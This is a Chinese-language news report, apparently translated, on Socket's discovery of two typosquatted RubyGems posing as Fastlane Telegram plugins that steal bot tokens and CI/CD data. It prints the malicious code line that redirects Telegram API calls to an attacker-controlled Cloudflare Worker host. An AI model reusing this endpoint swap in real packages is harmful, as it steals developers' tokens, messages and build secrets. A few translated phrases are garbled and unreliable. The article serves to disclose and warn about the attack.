Socket的威胁研究团队发现了利用恶意RubyGems冒充Fastlane插件的有针对性的供应链攻击。攻击者利用越南对Telegram变通办法的需求增加,分发从CI / CD管道中秘密窃取敏感部署数据的宝石。
恶意宝石 – fastlane-plugin-telegram-proxy和fastlane-plugin-proxy_teleram – 由威胁行为者使用越南别名Bùi nam,buidanhnam和si_mobile发布。这些软件包伪装成 Fastlane 的合法 Telegram 通知工具,Fastlane 是移动应用程序开发中流行的自动化工具。
乍一看,宝石似乎无害。他们:
- ①克隆合法的 fastlane-plugin-telegram 插件,
- ②保留预期的行为和界面,
- ③保存 README 文档,甚至链接到分叉的 GitHub 仓库。
但是,一行代码的微妙切换使它们变得恶意:
# Legitimate endpoint
uri = URI.parse("https://api.telegram.org/bot#{token}/sendMessage")
# Malicious version
uri = URI.parse("https://rough-breeze-0c37[.]buidanhnam95[.]workers[.]dev/bot#{token}/sendMessage")“这种微妙的变化通过威胁行为者的中继重定向了每个Telegram API调用,”Socket解释说。
威胁行为者的 Cloudflare Worker 代理捕获:
- ①Telegram bot 令牌
- ②聊天 ID 和消息内容
- ③上传文件(例如,日志、工件)
- ④可选代理凭据
“该插件仍然返回Telegram的有效响应,使行为难以检测,”Socket指出。这些机器人令牌提供了对受害者Telegram机器人的完全访问权限,使攻击者能够冒充,删除或操纵机器人通信。
Fastlane插件通常在CI/CD管道内运行,处理:
- ①代码签名密钥
- ②释放二进制文件
- ③Environment环境变量和秘密
“因为Fastlane运行在处理敏感资产的CI / CD管道中……因此影响深入到软件构建和发布工作流程中。
后门宝石没有试图限制区域或使用上下文。任何使用该插件的开发人员或团队都是脆弱的——无论地理位置如何。
为了逃避检测并提高搜索可见性,攻击者采用:
- ①Typosquatting(电报而不是电报)
- ②战略使用后缀(-代理)
- ③将分叉的 GitHub 仓库链接为软件包主页
“RubyGems上快速通道插件远程图的搜索结果显示了与合法插件一起排列的恶意错字标记的宝石。
、
尽管有明确的恶意意图,但在撰写本文时,这两个宝石仍然可以在RubyGems上使用。
发表评论
您还未登录,请先登录。
登录